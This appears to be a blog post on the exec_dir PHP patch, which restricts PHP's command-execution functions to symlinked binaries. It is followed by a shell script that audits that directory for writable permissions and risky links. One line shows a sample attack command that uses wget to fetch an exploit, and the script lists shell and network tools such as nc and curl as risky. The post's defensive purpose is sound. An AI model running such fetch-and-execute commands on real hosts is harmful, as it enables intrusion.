Pretty Cool PHP Patch exec_dir

http://kyberdigi.cz/projects/execdir/english.html

I never really looked at it until recently; it was on the back burner, so to say. A lot of hosts disable exec, system, shell_exec, etc. This, however, breaks some scripts that need things like ImageMagick, since it is usually called using one of the system command functions. I started playing around with the patch and it's pretty neat.

Patch PHP
add exec_dir = /usr/local/phpchroot

and then symlink things into that directory, for example:

ln -s /usr/bin/convert /usr/local/phpchroot/convert (just an example name)

Now if people try to run things like

system("wget http://www.domain.com/exploit");

it won't let them, because the binary is not in the chroot folder. But if they try to run "convert", which is ImageMagick, they can run it.

Just something to play around with.
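
An added example (not part of the original post or of the exec_dir patch itself): a shell function that audits the directory named by exec_dir, since whatever is linked there is the full set of commands PHP can run. The RISKY_NAMES list and the output labels are assumptions made for this example.

```shell
#!/bin/sh
# Added example: audit the directory that exec_dir points at.
# Every entry in it is a command PHP scripts are allowed to execute.

# Names that give back general command execution or downloads if linked in.
# (Constructed list for illustration; extend it for your own hosts.)
RISKY_NAMES="sh bash dash ksh zsh csh tcsh perl python python3 ruby php env wget curl nc ncat"

is_risky() {
    for r in $RISKY_NAMES; do
        [ "$1" = "$r" ] && return 0
    done
    return 1
}

# audit_exec_dir DIR: print one finding per line.
audit_exec_dir() {
    dir=$1
    [ -d "$dir" ] || { echo "MISSING $dir"; return 0; }

    # A world-writable allow-list directory lets any local user add entries.
    if [ -n "$(find "$dir" -prune -perm -0002)" ]; then
        echo "WRITABLE $dir"
    fi

    for entry in "$dir"/*; do
        [ -e "$entry" ] || [ -L "$entry" ] || continue
        name=$(basename "$entry")
        # Resolve the link so a harmless-looking name cannot hide its target.
        target=$(readlink -f "$entry" 2>/dev/null || true)
        if [ -z "$target" ] || [ ! -e "$target" ]; then
            echo "BROKEN $name"
        elif is_risky "$name" || is_risky "$(basename "$target")"; then
            echo "RISKY $name -> $target"
        elif [ ! -x "$target" ]; then
            echo "NOEXEC $name -> $target"
        else
            echo "OK $name -> $target"
        fi
    done
}

# Audit the path given as the first argument, when there is one.
if [ -n "${1:-}" ]; then audit_exec_dir "$1"; fi
```

Run it as `sh audit.sh /usr/local/phpchroot` (the script name is hypothetical) after adding or changing a symlink.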
